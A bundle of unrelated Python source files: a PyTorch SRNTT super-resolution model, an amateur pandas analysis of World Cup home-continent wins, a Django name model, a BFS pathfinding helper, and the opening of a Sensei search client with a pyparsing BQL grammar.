self.reconstructor = self._reconstructor()
if self.use_weights and self.concat:
self.a = torch.ones(3)
self.a.requires_grad = True
self.b = torch.zeros(3)
self.b.requires_grad = True
self.texture_transfer = self._texture_transfer()
self.texture_fusion_medium = self._texture_fusion('medium')
self.texture_fusion_large = self._texture_fusion('large')
self.srntt_out = nn.Sequential(nn.Conv2d(32, 3, 1, 1, 0), self.tanh)
self._init_param()
def _init_param(self):
def _norm_init_conv2d_(m):
if isinstance(m, nn.Conv2d):
nn.init.normal_(m.weight, mean=0., std=0.02)
def _norm_init_batchnorm_(m):
if isinstance(m, nn.BatchNorm2d):
nn.init.normal_(m.weight, mean=1., std=0.02)
self.content_extractor.apply(_norm_init_conv2d_)
self.content_extractor.apply(_norm_init_batchnorm_)
self.reconstructor.apply(_norm_init_conv2d_)
self.texture_transfer.apply(_norm_init_conv2d_)
self.texture_transfer.apply(_norm_init_batchnorm_)
self.texture_fusion_medium.apply(_norm_init_conv2d_)
self.texture_fusion_medium.apply(_norm_init_batchnorm_)
self.texture_fusion_large.apply(_norm_init_conv2d_)
self.texture_fusion_large.apply(_norm_init_batchnorm_)
self.srntt_out.apply(_norm_init_conv2d_)
def _content_extractor(self):
# (3, h, w) => (64, h, w)
layers = [nn.Sequential(nn.Conv2d(3, 64, 3, 1, 1), self.relu)]
# (64, h, w) => (64, h, w)
res_layers = []
for _ in range(16):
res_layers.append(ResBlock(64, 64, self.relu))
layers.append(nn.Sequential(*res_layers))
# (64, h, w) => (64, h, w)
layers.append(nn.Sequential(
nn.Conv2d(64, 64, 3, 1, 1),
nn.BatchNorm2d(64),
))
return nn.ModuleList(layers)
def _reconstructor(self):
layers = [
# (64, h, w) => (64, h*2, w*2)
nn.Sequential(nn.Conv2d(64, 256, 3, 1, 1), nn.PixelShuffle(upscale_factor=2), self.relu),
# (64, h*2, w*2) => (64, h*4, w*4)
nn.Sequential(nn.Conv2d(64, 256, 3, 1, 1), nn.PixelShuffle(upscale_factor=2), self.relu),
# (64, h*4, w*4) => (3, h*4, w*4)
nn.Sequential(nn.Conv2d(64, 3, 1, 1, 0), self.tanh),
]
return nn.Sequential(*layers)
def _texture_transfer(self):
layers = [nn.Sequential(nn.Conv2d(128, 64, 3, 1, 1), self.relu)]
res_blocks = []
for _ in range(self.n_resblocks):
res_blocks.append(ResBlock(64, 64, self.relu))
layers.append(nn.Sequential(*res_blocks))
layers.append(nn.Sequential(nn.Conv2d(64, 64, 3, 1, 1), nn.BatchNorm2d(64)))
layers.append(nn.Sequential(nn.Conv2d(64, 256, 3, 1, 1), nn.PixelShuffle(upscale_factor=2), self.relu))
return nn.ModuleList(layers)
def _texture_fusion(self, name):
if name == 'medium':
n_resblocks = self.n_resblocks // 2
end_layer = nn.Sequential(nn.Conv2d(64, 256, 3, 1, 1), nn.PixelShuffle(upscale_factor=2), self.relu)
elif name == 'large':
n_resblocks = self.n_resblocks // 4
end_layer = nn.Conv2d(64, 32, 3, 1, 1)
else:
raise ValueError('No such layer name {}!'.format(name))
layers = [nn.Sequential(nn.Conv2d(128, 64, 3, 1, 1), self.relu)]
res_blocks = []
for _ in range(n_resblocks):
res_blocks.append(ResBlock(64, 64, self.relu))
layers.append(nn.Sequential(*res_blocks))
layers.append(nn.Sequential(nn.Conv2d(64, 64, 3, 1, 1), nn.BatchNorm2d(64)))
layers.append(end_layer)
return nn.ModuleList(layers)
def forward(self, x, weights, maps):
x = self.content_extractor[0](x)
output = self.content_extractor[1](x)
content_feature = self.content_extractor[2](output)
output = x + content_feature
output_upscale = self.reconstructor(output)
if maps is None:
return output_upscale, None
assert isinstance(maps, (list, tuple))
output = content_feature
for idx, sub_module in enumerate([self.texture_transfer, self.texture_fusion_medium, self.texture_fusion_large]):
if self.use_weights and self.concat:
new_weights = F.interpolate(weights, scale_factor=2**idx, mode='bicubic', align_corners=True)
map_ref = maps[idx] * torch.sigmoid(self.a[idx] * new_weights + self.b[idx])
else:
map_ref = maps[idx]
map_in = output
output = sub_module[0](torch.cat([map_in, map_ref], dim=1))
output = sub_module[1](output)
output = sub_module[2](output)
output = sub_module[3](output + map_in)
output_srntt = self.srntt_out(output)
return output_upscale, output_srntt
if __name__ == '__main__':
net = SRNTT(8, True, True)
x = torch.randn(1, 3, 16, 16)
maps = [torch.randn(1, 64, 16, 16), torch.randn(1, 64, 32, 32), torch.randn(1, 64, 64, 64)]
weights = torch.randn(1, 1, 16, 16)
net(x, weights, maps)
|
#The question being answered is: Does playing in your home continent make a difference?
#Load in packages needed
import pandas as pd
#Load in Datasets
cups = pd.read_csv('/Users/ethanmitten/Desktop/Data Analytics/Python Projects/WorldCupDataset/WorldCups.csv')
matches = pd.read_csv('/Users/ethanmitten/Desktop/Data Analytics/Python Projects/WorldCupDataset/WorldCupMatches.csv')
#See some general information and then see how many null values are missing
print(matches.info)
x = matches.isnull().sum()
print(x)
#Shorten data down to only relevant rows
matches_clean = matches[0:852]
#Drop Null Values and Print Output of How Many Null Values Left
matches_clean = matches_clean.dropna()
#Merge Datasets to get the Host Country for each match
merged_mc = pd.merge(matches_clean, cups, on='Year')
merged_mc = merged_mc.drop(merged_mc.columns[[21,22,23,24,25,26,27,28]], axis=1)
#Add new columns that return boolean values based on whether win or lose
merged_mc['Home_Team_Wins'] = merged_mc['Home Team Goals'].gt(merged_mc['Away Team Goals'])
merged_mc['Away_Team_Wins'] = merged_mc['Away Team Goals'].gt(merged_mc['Home Team Goals'])
#Making Columns for Home Team and Away Team Continents
rating = []
for row in merged_mc['Home Team Name']:
if row == 'France' : rating.append('Europe')
elif row == 'England': rating.append('Europe')
elif row == 'USA': rating.append('North_America')
elif row == 'Poland': rating.append('Europe')
elif row == 'Portugal': rating.append('Europe')
elif row == 'Algeria': rating.append("Africa")
elif row == 'Angola': rating.append("Africa")
elif row == 'Argentina': rating.append("South_America")
elif row == 'Australia': rating.append("Australia")
elif row == 'Austria': rating.append("Europe")
elif row == 'Belgium': rating.append("Europe")
elif row == 'Brazil': rating.append("South_America")
elif row == 'Bolivia': rating.append("South_America")
elif row == 'Bulgaria': rating.append("Europe")
elif row == 'Cameroon': rating.append("Africa")
elif row == 'Canada': rating.append("North_America")
elif row == 'Chile': rating.append("South_America")
elif row == 'China PR': rating.append("Asia")
elif row == 'Colombia': rating.append("South_America")
elif row == 'Costa Rica': rating.append("North_America")
elif row == 'Croatia': rating.append("Europe")
elif row == 'Cuba': rating.append("North_America")
elif row == 'Czech Republic': rating.append("Europe")
elif row == 'Czechoslovakia': rating.append("Europe")
elif row == "Cote d'Ivoire": rating.append("Africa")
elif row == 'Denmark': rating.append("Europe")
elif row == 'Ecuador': rating.append("South_America")
elif row == 'German DR': rating.append("Europe")
elif row == 'Germany': rating.append("Europe")
elif row == 'Germany FR': rating.append("Europe")
elif row == 'Ghana': rating.append("Africa")
elif row == 'Greece': rating.append("Europe")
elif row == 'Haiti': rating.append("North_America")
elif row == 'Honduras': rating.append("North_America")
elif row == 'Hungary': rating.append("Europe")
elif row == 'IR Iran': rating.append("Asia")
elif row == 'Iran': rating.append("Asia")
elif row == 'Iraq': rating.append("Asia")
elif row == 'Italy': rating.append("Europe")
elif row == 'Jamaica': rating.append("North_America")
elif row == 'Japan': rating.append("Asia")
elif row == 'Korea DPR': rating.append("Asia")
elif row == 'Korea Republic': rating.append("Asia")
elif row == 'Mexico': rating.append("North_America")
elif row == 'Morocco': rating.append("Africa")
elif row == 'Netherlands': rating.append("Europe")
elif row == 'New Zealand': rating.append("Australia")
elif row == 'Nigeria': rating.append("Africa")
elif row == 'Northern Ireland': rating.append("Europe")
elif row == 'Norway': rating.append("Europe")
elif row == 'Paraguay': rating.append("South_America")
elif row == 'Peru': rating.append("South_America")
elif row == 'Romania': rating.append("Europe")
elif row == 'Russia': rating.append("Europe")
elif row == 'Saudi Arabia': rating.append("Asia")
elif row == 'Scotland': rating.append("Europe")
elif row == 'Senegal': rating.append("Africa")
elif row == 'Serbia': rating.append("Europe")
elif row == 'Slovakia': rating.append("Europe")
elif row == 'Slovenia': rating.append("Europe")
elif row == 'South Africa': rating.append("Africa")
elif row == 'Soviet Union': rating.append("Europe")
elif row == 'Spain': rating.append("Europe")
elif row == 'Sweden': rating.append("Europe")
elif row == 'Switzerland': rating.append("Europe")
elif row == 'Togo': rating.append("Africa")
elif row == 'Tunisia': rating.append("Africa")
elif row == 'Turkey': rating.append("Europe")
elif row == 'Ukraine': rating.append("Europe")
elif row == 'Uruguay': rating.append("South_America")
elif row == 'Wales': rating.append("Europe")
elif row == 'Yugoslavia': rating.append("Europe")
elif row == 'Zaire': rating.append("Africa")
else: rating.append('Not_Rated')
merged_mc['Home_Cont'] = rating
ratings = []
for row in merged_mc['Away Team Name']:
if row == 'France' : ratings.append('Europe')
elif row == 'England': ratings.append('Europe')
elif row == 'USA': ratings.append('North_America')
elif row == 'Poland': ratings.append('Europe')
elif row == 'Portugal': ratings.append('Europe')
elif row == 'Algeria': ratings.append("Africa")
elif row == 'Angola': ratings.append("Africa")
elif row == 'Argentina': ratings.append("South_America")
elif row == 'Australia': ratings.append("Australia")
elif row == 'Austria': ratings.append("Europe")
elif row == 'Belgium': ratings.append("Europe")
elif row == 'Brazil': ratings.append("South_America")
elif row == 'Bolivia': ratings.append("South_America")
elif row == 'Bulgaria': ratings.append("Europe")
elif row == 'Cameroon': ratings.append("Africa")
elif row == 'Canada': ratings.append("North_America")
elif row == 'Chile': ratings.append("South_America")
elif row == 'China PR': ratings.append("Asia")
elif row == 'Colombia': ratings.append("South_America")
elif row == 'Costa Rica': ratings.append("North_America")
elif row == 'Croatia': ratings.append("Europe")
elif row == 'Cuba': ratings.append("North_America")
elif row == 'Czech Republic': ratings.append("Europe")
elif row == 'Czechoslovakia': ratings.append("Europe")
elif row == "Cote d'Ivoire": ratings.append("Africa")
elif row == 'Denmark': ratings.append("Europe")
elif row == 'Ecuador': ratings.append("South_America")
elif row == 'German DR': ratings.append("Europe")
elif row == 'Germany': ratings.append("Europe")
elif row == 'Germany FR': ratings.append("Europe")
elif row == 'Ghana': ratings.append("Africa")
elif row == 'Greece': ratings.append("Europe")
elif row == 'Haiti': ratings.append("North_America")
elif row == 'Honduras': ratings.append("North_America")
elif row == 'Hungary': ratings.append("Europe")
elif row == 'IR Iran': ratings.append("Asia")
elif row == 'Iran': ratings.append("Asia")
elif row == 'Iraq': ratings.append("Asia")
elif row == 'Italy': ratings.append("Europe")
elif row == 'Jamaica': ratings.append("North_America")
elif row == 'Japan': ratings.append("Asia")
elif row == 'Korea DPR': ratings.append("Asia")
elif row == 'Korea Republic': ratings.append("Asia")
elif row == 'Mexico': ratings.append("North_America")
elif row == 'Morocco': ratings.append("Africa")
elif row == 'Netherlands': ratings.append("Europe")
elif row == 'New Zealand': ratings.append("Australia")
elif row == 'Nigeria': ratings.append("Africa")
elif row == 'Northern Ireland': ratings.append("Europe")
elif row == 'Norway': ratings.append("Europe")
elif row == 'Paraguay': ratings.append("South_America")
elif row == 'Peru': ratings.append("South_America")
elif row == 'Romania': ratings.append("Europe")
elif row == 'Russia': ratings.append("Europe")
elif row == 'Saudi Arabia': ratings.append("Asia")
elif row == 'Scotland': ratings.append("Europe")
elif row == 'Senegal': ratings.append("Africa")
elif row == 'Serbia': ratings.append("Europe")
elif row == 'Slovakia': ratings.append("Europe")
elif row == 'Slovenia': ratings.append("Europe")
elif row == 'South Africa': ratings.append("Africa")
elif row == 'Soviet Union': ratings.append("Europe")
elif row == 'Spain': ratings.append("Europe")
elif row == 'Sweden': ratings.append("Europe")
elif row == 'Switzerland': ratings.append("Europe")
elif row == 'Togo': ratings.append("Africa")
elif row == 'Tunisia': ratings.append("Africa")
elif row == 'Turkey': ratings.append("Europe")
elif row == 'Ukraine': ratings.append("Europe")
elif row == 'Uruguay': ratings.append("South_America")
elif row == 'Wales': ratings.append("Europe")
elif row == 'Yugoslavia': ratings.append("Europe")
elif row == 'Egypt': ratings.append("Africa")
elif row == 'Kuwait': ratings.append("Asia")
elif row == 'El Salvador': ratings.append("North_America")
elif row == 'Israel': ratings.append("Asia")
elif row == 'Dutch West Indies': ratings.append("Asia")
elif row == 'Zaire': ratings.append("Africa")
else: ratings.append('Not_Rated')
merged_mc['Away_Cont'] = ratings
#From this we find True is seen 486 times and False is seen the rest of the time
print(merged_mc['Home_Team_Wins'].describe())
#Make datasets strictly for the winning teams
home_winners = merged_mc[merged_mc['Home_Team_Wins'] == True]
away_winners = merged_mc[merged_mc['Away_Team_Wins'] == True]
#Separate datasets into series for showing outcomes when grouped by Year and Continent
home_year_winners = home_winners.groupby(['Year', 'Home_Cont']).size()
away_year_winners = home_winners.groupby(['Year', 'Away_Cont']).size()
#Concatenate home_year_winners and away_year_winners for easier interpretations in dictionary
merged_winners = pd.concat([home_year_winners, away_year_winners], axis=1)
#Create dictionary for results obtained in merged_winners table
final_piece = {'Year': [1930, 1934, 1938, 1950, 1954, 1958, 1962, 1966, 1970, 1974,
1978, 1982, 1986, 1990, 1994, 1998, 2002, 2006, 2010, 2014],
'Host_Country': ['Uruguay', 'Italy', 'France', 'Brazil', 'Switzerland',
'Sweden', 'Chile', 'England', 'Mexico', 'Germany',
'Argentina', 'Spain', 'Mexico', 'Italy', 'USA',
'France', 'Korea/Japan', 'Germany', 'South Africa',
'Brazil'],
'Host_Continent': ['South_America', 'Europe', 'Europe', 'South_America',
'Europe', 'Europe', 'South_America', 'Europe', 'North_America',
'Europe', 'South_America', 'Europe', 'North_America', 'Europe',
'North_America', 'Europe', 'Asia', 'Europe', 'Africa', 'South_America'],
'Europe_Wins': [10,28,23,19,37,37,33,40,30,19,36,33,24,32,29,30,27,26,19,25],
'South_America_Wins': [20,2,4,13,7,9,18,10,15,7,15,10,12,9,8,12,10,11,10,23],
'North_America_Wins': [6,1,2,6,2,2,3,1,6,2,3,3,3,5,4,3,4,6,3,6],
'Africa': [0,1,0,0,0,0,0,0,2,1,2,1,1,4,6,6,5,6,4,6],
'Australia':[0,0,0,0,0,0,0,0,0,1,0,3,0,0,0,0,0,3,2,1],
'Asia': [0,0,0,0,2,0,0,3,1,0,2,2,2,1,3,5,8,5,7,3]}
#Make a final dataframe that details our findings to the question
final_dataframe = pd.DataFrame.from_dict(final_piece)
#The conclusion that is made is that host country does NOT have an affect on how many wins are gathered
#as Europe has the most wins in every World Cup played
|
from django.db import models
class NameManager(models.Manager):
def get_unused(self):
"""
Returns all unused entities.
"""
return self.filter(used=False)
def get_used(self):
"""
Returns all used entities.
"""
return self.filter(used=True)
def get_unused_random(self):
"""
Returns one random unused name.
"""
try:
return self.get_unused().order_by('?').first()
except:
return None
class Name(models.Model):
name = models.CharField(max_length=100, help_text="The name.")
used = models.BooleanField(default=False, help_text="Check after the name is used.")
objects = NameManager()
def save(self):
# capitalize using the .title() method ONLY if the user did not enter ANY capital letters
if not self.pk:
value = getattr(self, 'name')
if (not any(x.isupper() for x in value)):
setattr(self, 'name', value.title())
super(Name, self).save()
def __unicode__(self):
return self.name
|
def neighbors(current, grid):
size_x = len(grid[0])
size_y = len(grid)
res = []
if current[0] - 1 >= 0:
res.append((current[0] - 1, current[1]))
if current[0] + 1 < size_x:
res.append((current[0] + 1, current[1]))
if current[1] - 1 >= 0:
res.append((current[0], current[1] - 1))
if current[1] + 1 < size_y:
res.append((current[0], current[1] + 1))
return res
def bfs(start, goals, grid):
"""
Using BFS to get path to nearest goal.
:param start:
:param goals:
:param grid:
:return:
"""
size_x = len(grid[0])
size_y = len(grid)
visited = [[False for _ in range(size_x)] for _ in range(size_y)]
parent = [[None for _ in range(size_x)] for _ in range(size_y)]
queue = [start]
visited[start[1]][start[0]] = True
while queue:
current = queue.pop(0)
if current in goals:
path = []
while parent[current[1]][current[0]]:
path.append(current)
current = parent[current[1]][current[0]]
return path[::-1]
for neighbor in neighbors(current, grid):
if not visited[neighbor[1]][neighbor[0]]:
queue.append(neighbor)
parent[neighbor[1]][neighbor[0]] = current
visited[neighbor[1]][neighbor[0]] = True
raise ValueError('No Path Found')
|
#!/usr/bin/env python
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Python client library for Sensei
"""
import urllib
import urllib2
import json
import sys
import logging
import datetime
logger = logging.getLogger("sensei_client")
# TODO:
#
# 1. Term vector
#
# REST API parameter constants
#
PARAM_OFFSET = "start"
PARAM_COUNT = "rows"
PARAM_QUERY = "q"
PARAM_QUERY_PARAM = "qparam"
PARAM_SORT = "sort"
PARAM_SORT_ASC = "asc"
PARAM_SORT_DESC = "desc"
PARAM_SORT_SCORE = "relevance"
PARAM_SORT_SCORE_REVERSE = "relrev"
PARAM_SORT_DOC = "doc"
PARAM_SORT_DOC_REVERSE = "docrev"
PARAM_FETCH_STORED = "fetchstored"
PARAM_SHOW_EXPLAIN = "showexplain"
PARAM_ROUTE_PARAM = "routeparam"
PARAM_GROUP_BY = "groupby"
PARAM_MAX_PER_GROUP = "maxpergroup"
PARAM_SELECT = "select"
PARAM_SELECT_VAL = "val"
PARAM_SELECT_NOT = "not"
PARAM_SELECT_OP = "op"
PARAM_SELECT_OP_AND = "and"
PARAM_SELECT_OP_OR = "or"
PARAM_SELECT_PROP = "prop"
PARAM_FACET = "facet"
PARAM_DYNAMIC_INIT = "dyn"
PARAM_PARTITIONS = "partitions"
PARAM_FACET_EXPAND = "expand"
PARAM_FACET_MAX = "max"
PARAM_FACET_MINHIT = "minhit"
PARAM_FACET_ORDER = "order"
PARAM_FACET_ORDER_HITS = "hits"
PARAM_FACET_ORDER_VAL = "val"
PARAM_DYNAMIC_TYPE = "type"
PARAM_DYNAMIC_TYPE_STRING = "string"
PARAM_DYNAMIC_TYPE_BYTEARRAY = "bytearray"
PARAM_DYNAMIC_TYPE_BOOL = "boolean"
PARAM_DYNAMIC_TYPE_INT = "int"
PARAM_DYNAMIC_TYPE_LONG = "long"
PARAM_DYNAMIC_TYPE_DOUBLE = "double"
PARAM_DYNAMIC_VAL = "vals"
PARAM_RESULT_PARSEDQUERY = "parsedquery"
PARAM_RESULT_HIT_STORED_FIELDS = "stored"
PARAM_RESULT_HIT_STORED_FIELDS_NAME = "name"
PARAM_RESULT_HIT_STORED_FIELDS_VALUE = "val"
PARAM_RESULT_HIT_EXPLANATION = "explanation"
PARAM_RESULT_FACETS = "facets"
PARAM_RESULT_TID = "tid"
PARAM_RESULT_TOTALDOCS = "totaldocs"
PARAM_RESULT_NUMHITS = "numhits"
PARAM_RESULT_HITS = "hits"
PARAM_RESULT_HIT_UID = "uid"
PARAM_RESULT_HIT_DOCID = "docid"
PARAM_RESULT_HIT_SCORE = "score"
PARAM_RESULT_HIT_SRC_DATA = "srcdata"
PARAM_RESULT_TIME = "time"
PARAM_SYSINFO_NUMDOCS = "numdocs"
PARAM_SYSINFO_LASTMODIFIED = "lastmodified"
PARAM_SYSINFO_VERSION = "version"
PARAM_SYSINFO_FACETS = "facets"
PARAM_SYSINFO_FACETS_NAME = "name"
PARAM_SYSINFO_FACETS_RUNTIME = "runtime"
PARAM_SYSINFO_FACETS_PROPS = "props"
PARAM_SYSINFO_CLUSTERINFO = "clusterinfo"
PARAM_SYSINFO_CLUSTERINFO_ID = "id"
PARAM_SYSINFO_CLUSTERINFO_PARTITIONS = "partitions"
PARAM_SYSINFO_CLUSTERINFO_NODELINK = "nodelink"
PARAM_SYSINFO_CLUSTERINFO_ADMINLINK = "adminlink"
PARAM_RESULT_HITS_EXPL_VALUE = "value"
PARAM_RESULT_HITS_EXPL_DESC = "description"
PARAM_RESULT_HITS_EXPL_DETAILS = "details"
PARAM_RESULT_FACET_INFO_VALUE = "value"
PARAM_RESULT_FACET_INFO_COUNT = "count"
PARAM_RESULT_FACET_INFO_SELECTED = "selected"
# Group by related column names
GROUP_VALUE = "groupvalue"
GROUP_HITS = "grouphits"
# Default constants
DEFAULT_REQUEST_OFFSET = 0
DEFAULT_REQUEST_COUNT = 10
DEFAULT_REQUEST_MAX_PER_GROUP = 10
DEFAULT_FACET_MINHIT = 1
DEFAULT_FACET_MAXHIT = 10
DEFAULT_FACET_ORDER = PARAM_FACET_ORDER_HITS
#
# Definition of the BQL statement grammar
#
from pyparsing import Literal, CaselessLiteral, Word, Upcase, delimitedList, Optional, \
Combine, Group, alphas, nums, alphanums, ParseException, Forward, oneOf, quotedString, \
ZeroOrMore, restOfLine, Keyword, OnlyOnce, Suppress, removeQuotes, NotAny, OneOrMore, MatchFirst
"""
BNF Grammar for BQL
===================
<statement> ::= ( <select_stmt> | <describe_stmt> ) [';']
<select_stmt> ::= SELECT <select_list> <from_clause> [<where_clause>] [<given_clause>] <additional_clauses>
<describe_stmt> ::= ( DESC | DESCRIBE ) <index_name>
<select_list> ::= '*' | <column_name_list>
<column_name_list> ::= <column_name> ( ',' <column_name> )*
<from_clause> ::= FROM <index_name>
<where_clause> ::= WHERE <search_condition>
<search_condition> ::= <predicates>
| <cumulative_predicates>
<predicates> ::= <predicate> ( AND <predicate> )*
<predicate> ::= <in_predicate>
| <contains_all_predicate>
| <equal_predicate>
| <not_equal_predicate>
| <query_predicate>
| <between_predicate>
| <same_column_or_pred>
<in_predicate> ::= <column_name> [NOT] IN <value_list> [<except_clause>] [<predicate_props>]
<contains_all_predicate> ::= <column_name> CONTAINS ALL <value_list> [<except_clause>] [<predicate_props>]
<equal_predicate> ::= <column_name> '=' <value> [<predicate_props>]
<not_equal_predicate> ::= <column_name> '<>' <value> [<predicate_props>]
<query_predicate> ::= QUERY IS <quoted_string>
<between_predicate> ::= <column_name> [NOT] BETWEEN <value> AND <value>
<same_column_or_pred> ::= '(' + <cumulative_predicates> + ')'
<cumulative_predicates> ::= <cumulative_predicate> ( ',' <cumulative_predicate> )*
<cumulative_predicate> ::= <in_predicate>
| <equal_predicate>
| <between_predicate>
<value_list> ::= '(' <value> ( ',' <value> )* ')'
<value> ::= <quoted_string> | <num>
<except_clause> ::= EXCEPT <value_list>
<predicate_props> ::= WITH <prop_list>
<prop_list> ::= '(' <key_value_pair> ( ',' <key_value_pair> )* ')'
<key_value_pair> ::= <quoted_string> ':' <quoted_string>
<given_clause> ::= GIVEN FACET PARAM <facet_param_list>
<facet_param_list> ::= <facet_param> ( ',' <facet_param> )*
<facet_param> ::= '(' <facet_name> <facet_param_name> <facet_param_type> <facet_param_value> ')'
<facet_param_name> ::= <quoted_string>
<facet_param_type> ::= BOOLEAN | INT | LONG | STRING | BYTEARRAY | DOUBLE
<facet_param_value> ::= <quoted_string>
<additional_clauses> ::= ( <additional_clause> )*
<additional_clause> ::= <order_by_clause>
| <group_by_clause>
| <limit_clause>
| <browse_by_clause>
| <fetching_stored_clause>
<order_by_clause> ::= ORDER BY <sort_specs>
<sort_specs> ::= <sort_spec> ( ',', <sort_spec> )*
<sort_spec> ::= <column_name> [<ordering_spec>]
<ordering_spec> ::= ASC | DESC
<group_by_clause> ::= GROUP BY <group_spec>
<group_spec> ::= <facet_name> [TOP <max_per_group>]
<limit_clause> ::= LIMIT [<offset> ','] <count>
<offset> ::= ( <digit> )+
<count> ::= ( <digit> )+
<browse_by_clause> ::= BROWSE BY <facet_specs>
<facet_specs> ::= <facet_spec> ( ',' <facet_spec> )*
<facet_spec> ::= <facet_name> [<facet_expression>]
<facet_expression> ::= '(' <expand_flag> <count> <count> <facet_ordering> ')'
<expand_flag> ::= TRUE | FALSE
<facet_ordering> ::= HITS | VALUE
<fetching_stored_clause> ::= FETCHING STORED [<fetching_flag>]
<fetching_flag> ::= TRUE | FALSE
<quoted_string> ::= '"' ( <char> )* '"'
| "'" ( <char> )* "'"
<identifier> ::= <identifier_start> ( <identifier_part> )*
<identifier_start> ::= <alpha> | '-' | '_'
<identifier_part> ::= <identifier_start> | <digit>
<column_name> ::= <identifier>
<facet_name> ::= <identifier>
<alpha> ::= <alpha_lower_case> | <alpha_upper_case>
<alpha_upper_case> ::= A | B | C | D | E | F | G | H | I | J | K | L | M | N | O
| P | Q | R | S | T | U | V | W | X | Y | Z
<alpha_lower_case> ::= a | b | c | d | e | f | g | h | i | j | k | l | m | n | o
| p | q | r | s | t | u | v | w | x | y | z
<digit> ::= 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9
<num> ::= ( <digit> )+
"""
def order_by_act(s, loc, tok):
for order in tok[1:]:
if (order[0] == PARAM_SORT_SCORE and len(order) > 1):
raise ParseException(s, loc, "%s should not be followed by %s"
% (PARAM_SORT_SCORE, order[1]))
limit_once = OnlyOnce(lambda s, loc, tok: tok)
order_by_once = OnlyOnce(order_by_act)
group_by_once = OnlyOnce(lambda s, loc, tok: tok)
browse_by_once = OnlyOnce(lambda s, loc, tok: tok)
fetching_stored_once = OnlyOnce(lambda s, loc, tok: tok)
def reset_all():
limit_once.reset()
order_by_once.reset()
group_by_once.reset()
browse_by_once.reset()
fetching_stored_once.reset()
#
# BQL tokens
#
# Remember to use lower case in the definition because we use
# Keyword.match to do comparison at other places in the code.
#
ALL = Keyword("all", caseless=True)
AND = Keyword("and", caseless=True)
ASC = Keyword("asc", caseless=True)
BETWEEN = Keyword("between", caseless=True)
BOOLEAN = Keyword("boolean", caseless=True)
BROWSE = Keyword("browse", caseless=True)
BY = Keyword("by", caseless=True)
BYTEARRAY = Keyword("bytearray", caseless=True)
CONTAINS = Keyword("contains", caseless=True)
DESC = Keyword("desc", caseless=True)
DESCRIBE = Keyword("describe", caseless=True)
DOUBLE = Keyword("double", caseless=True)
EXCEPT = Keyword("except", caseless=True)
FACET = Keyword("facet", caseless=True)
FALSE = Keyword("false", caseless=True)
FETCHING = Keyword("fetching", caseless=True)
FROM = Keyword("from", caseless=True)
GROUP = Keyword("group", caseless=True)
GIVEN = Keyword("given", caseless=True)
HITS = Keyword("hits", caseless=True)
IN = Keyword("in", caseless=True)
INT = Keyword("int", caseless=True)
IS = Keyword("is", caseless=True)
LIMIT = Keyword("limit", caseless=True)
LONG = Keyword("long", caseless=True)
NOT = Keyword("not", caseless=True)
OR = Keyword("or", caseless=True)
ORDER = Keyword("order", caseless=True)
PARAM = Keyword("param", caseless=True)
QUERY = Keyword("query", caseless=True)
SELECT = Keyword("select", caseless=True)
STORED = Keyword("stored", caseless=True)
STRING = Keyword("string", caseless=True)
TOP = Keyword("top", caseless=True)
TRUE = Keyword("true", caseless=True)
VALUE = Keyword("value", caseless=True)
WHERE = Keyword("where", caseless=True)
WITH = Keyword("with", caseless=True)
keyword = MatchFirst((ALL, AND, ASC, BETWEEN, BOOLEAN, BROWSE, BY, BYTEARRAY,
CONTAINS, DESC, DESCRIBE, DOUBLE, EXCEPT,
FACET, FALSE, FETCHING, FROM, GROUP, GIVEN,
HITS, IN, INT, IS, LIMIT, LONG, NOT,
OR, ORDER, PARAM, QUERY,
SELECT, STORED, STRING, TOP, TRUE,
VALUE, WHERE, WITH
))
LPAR, RPAR, COMMA, COLON, SEMICOLON = map(Suppress,"(),:;")
EQUAL = "="
NOT_EQUAL = "<>"
select_stmt = Forward()
ident = Word(alphas, alphanums + "_$")
column_name = ~keyword + Word(alphas, alphanums + "_-")
facet_name = column_name.copy()
column_name_list = Group(delimitedList(column_name))
int_num = Word(nums).setParseAction(lambda t: int(t[0]))
quotedString.setParseAction(removeQuotes)
value = (int_num | quotedString)
value_list = LPAR + delimitedList(value) + RPAR
prop_pair = (quotedString + COLON + value)
predicate_props = (WITH + LPAR + delimitedList(prop_pair).setResultsName("prop_list") + RPAR)
in_predicate = (column_name + Optional(NOT) +
IN + value_list.setResultsName("value_list") +
Optional(EXCEPT + value_list.setResultsName("except_values")) +
Optional(predicate_props)
).setResultsName("in_pred")
contains_all_predicate = (column_name +
CONTAINS + ALL + value_list.setResultsName("value_list") +
Optional(EXCEPT + value_list.setResultsName("except_values")) +
Optional(predicate_props)
).setResultsName("contains_all_pred")
equal_predicate = (column_name +
EQUAL + value +
Optional(predicate_props)).setResultsName("equal_pred")
not_equal_predicate = (column_name +
NOT_EQUAL + value +
Optional(predicate_props)).setResultsName("not_equal_pred")
query_predicate = (QUERY + IS + quotedString).setResultsName("query_pred")
between_predicate = (column_name + Optional(NOT) +
BETWEEN + value + AND + value).setResultsName("between_pred")
cumulative_predicate = Group(in_predicate
| equal_predicate
| between_predicate
).setResultsName("cumulative_preds", listAllMatches=True)
cumulative_predicates = (cumulative_predicate +
OneOrMore(OR + cumulative_predicate))
same_column_or_pred = (LPAR + cumulative_predicates + RPAR).setResultsName("same_column_or_pred")
predicate = Group(in_predicate
| contains_all_predicate
| equal_predicate
| not_equal_predicate
| query_predicate
| between_predicate
| same_column_or_pred
).setResultsName("predicates", listAllMatches=True)
predicates = predicate + NotAny(OR) + ZeroOrMore(AND + predicate)
search_condition = Group(predicates | cumulative_predicates)
param_type = BOOLEAN | INT | LONG | STRING | BYTEARRAY | DOUBLE
facet_param = Group(LPAR + facet_name + COMMA + quotedString + COMMA +
param_type + COMMA + value + RPAR).setResultsName("facet_param", listAllMatches=True)
given_clause = (GIVEN + FACET + PARAM + delimitedList(facet_param))
orderseq = ASC | DESC
order_by_expression = Forward()
order_by_spec = Group(column_name + Optional(orderseq)).setResultsName("orderby_spec", listAllMatches=True)
order_by_expression << (order_by_spec + ZeroOrMore(COMMA + order_by_expression))
order_by_clause = (ORDER + BY + order_by_expression).setResultsName("orderby").setParseAction(order_by_once)
limit_clause = (LIMIT + Group(Optional(int_num + COMMA) + int_num)).setResultsName("limit").setParseAction(limit_once)
expand_flag = TRUE | FALSE
